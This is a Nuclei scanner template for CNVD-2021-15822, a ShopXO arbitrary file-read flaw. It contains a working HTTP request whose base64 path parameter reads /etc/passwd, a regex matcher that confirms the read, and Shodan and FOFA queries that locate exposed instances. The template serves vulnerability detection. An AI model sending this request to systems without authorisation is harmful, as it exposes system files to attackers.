nuclei-templates/http/cnvd/2021/CNVD-2021-15822.yaml

34 lines
941 B
YAML
Raw Normal View History

2021-06-04 03:01:01 +00:00
id: CNVD-2021-15822
info:
name: ShopXO Download File Read
author: pikpikcu
severity: high
2023-05-30 10:00:59 +00:00
description: |
ShopXO is an open source enterprise-level open source e-commerce system. ShopXO has an arbitrary file reading vulnerability, which can be used by attackers to obtain sensitive information.
reference:
- https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
metadata:
max-request: 1
verified: true
shodan-query: title:"ShopXO企业级B2C电商系统提供商"
fofa-query: app="ShopXO企业级B2C电商系统提供商"
tags: shopxo,lfi,cnvd,cnvd2021
2021-06-04 03:01:01 +00:00
http:
2021-06-04 03:01:01 +00:00
- raw:
- |
GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
2021-06-04 03:01:01 +00:00
- type: status
status:
- 200